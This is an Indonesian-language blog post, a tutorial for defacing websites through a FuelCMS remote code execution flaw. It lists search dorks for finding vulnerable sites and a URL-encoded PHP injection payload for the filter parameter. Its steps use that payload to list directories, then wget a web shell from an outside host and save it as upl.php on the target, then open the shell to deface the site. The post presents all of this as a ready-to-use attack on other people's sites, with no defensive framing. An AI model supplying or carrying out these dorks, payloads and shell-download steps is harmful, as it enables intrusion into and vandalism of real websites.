Breaking

Rabu, 28 Agustus 2019

Exploit FuelCMS Remote Code Execution

Wasap yo ey man. Dah lama gk nulis artikel di blog lagi euy bukan karena sibuk tapi karena males bhhhh, karena sekarang lagi gabut yowes tak coret coret blog lagi muwehehe.

Disini gw mau share tutorial deface (lagi) dengan exploit yg baru baru ya gk baru baru amat udh mayan lamaan cuma baru gw coret disini hwhw. Apa namanya? Cek title bro.

Ref: -Exploit-db
-Exploit kita

-Pertama lau need shell/uploader iyh taro shell/uploadernya di pastebin atau bisa make punya aink http://silverwings.mu/p/shell.txt
-Dork: intext:"FUEL CMS is developed with love by Daylight Studio"
intitle:"FUEL CMS"
inurl:/fuel/login
-Payload: fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27Command Here%27%29%2b%27

1: Dorking dulu bro klo mau sambil ngemil jajanan biar nyantuy dikit.
(Gw udh dapet targetna ea)
2: ketik > view-source di depan url target contoh (view-source:target.com) lalu masukan payloadnya, jangan lupa di payloadnya kelen kasih command buat upload shell/uploader sebagai contoh gw kasih command ls -la untuk memunculkan dir listing nya(view-source:target.com/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27ls -la%27%29%2b%27)
Nah muncul tuh dir listing nya muehehe
3: tinggal wget atau curl shell mu aja gayn contoh (view-source:target.com/fuel/pages/select/?filter=%27%2bpi%28print%28%24a%3d%27system%27%29%29%2b%24a%28%27wget http://site.com/shell.txt -O upl.php%27%29%2b%27)
4: jika sudah yo akses shell/uploadernya > target.com/shell.php
Berhasil :D tinggal perawanin web nya aja h3h3.


Tidak ada komentar:

Posting Komentar